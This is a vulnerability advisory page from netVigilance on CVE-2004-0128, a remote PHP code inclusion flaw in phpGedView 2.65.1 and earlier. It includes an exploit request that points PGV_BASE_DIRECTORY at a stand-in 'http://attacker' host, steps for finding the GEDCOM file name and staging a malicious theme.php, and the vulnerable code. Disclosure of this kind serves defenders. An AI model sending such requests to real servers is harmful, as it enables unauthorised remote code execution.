Search

 

 

 

 

 

CVE Logo

 

 

 

Best Security Research

 »  netVigilance is an active contributor to nvd.nist.gov
 
 » Every vulnerability in our database is independently scored according to CVSS 2.0
 
 » Our Scoring is compared to nvd.nist.gov and inconsistencies are reported to the NVD team at NIST
 
 »

netVigilance is responsible for more than 400 changes to the National Vulnerability Database - more than anyone else.
 

 » Our Professional Services team will validate any vulnerability Scoring for you.
 
netVigilance Security Advisory
 
 
 
Php Code Injection Vulnerabilities in
 
phpGedView 2.65.1 and prior
Home » Security Advisory 2 - CVE-2004-0128
*

Fact: More than 15 vulnerabilities were discovered EVERY day of 2009


Description:
PHP remote code injection vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script.

External References: 
Mitre CVE: CVE-2004-0128 
BUGTRAQ: 20040129 PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior

Summary: 
phpGedView is an open source system for online viewing of Gedcom information (family tree and genealogy information). Multiple PHP Code Injection vulnerabilities exist in the phpGedView product. They enable a malicious user to execute commands on the server.

Release Date:
January 29 2004

Severity:
High

SecureScout Testcase ID:
TC 17868 (Still in Development)

Vulnerable Systems:
phpGedView version 2.65.1 and prior

Vulnerability Type:
PHP Injection - force the Target to Execute a PHP file from Attackers Server

Vendor Status: 
The Vendor has been notified and has Released a Version 2.65.3 that fixes the problem

Example: 
(HIGH Risk no authentication needed)

- -- HTTP Request --

http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/

- -- HTTP Request --

Code impacted : [GED_File]_conf.php

123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"))
require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
124:else {
125: $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
126: require($THEME_DIR."theme.php");
127: }

The require call is only vulnerable when PHP register_globals is On.

In this case you have to obtain the name of the GEDCOM File used. Just perform a http://[target]/session.php request the GEDCOM file will be in argument of the login.php call.

The attacker has to create on his web site a directory call themes/standard, and a file theme.php

For example: theme.php = " ;?>

and the request, will execute the phpinfo() command on the vulnerable target.

Credits: 
Cedric Cochin - netVigilance Vulnerability Research team

 

back to Security Advisories 

 

Copyright©2004-2011,  netVigilance, Inc.   All rights reserved  • Privacy Policy

netVigilance©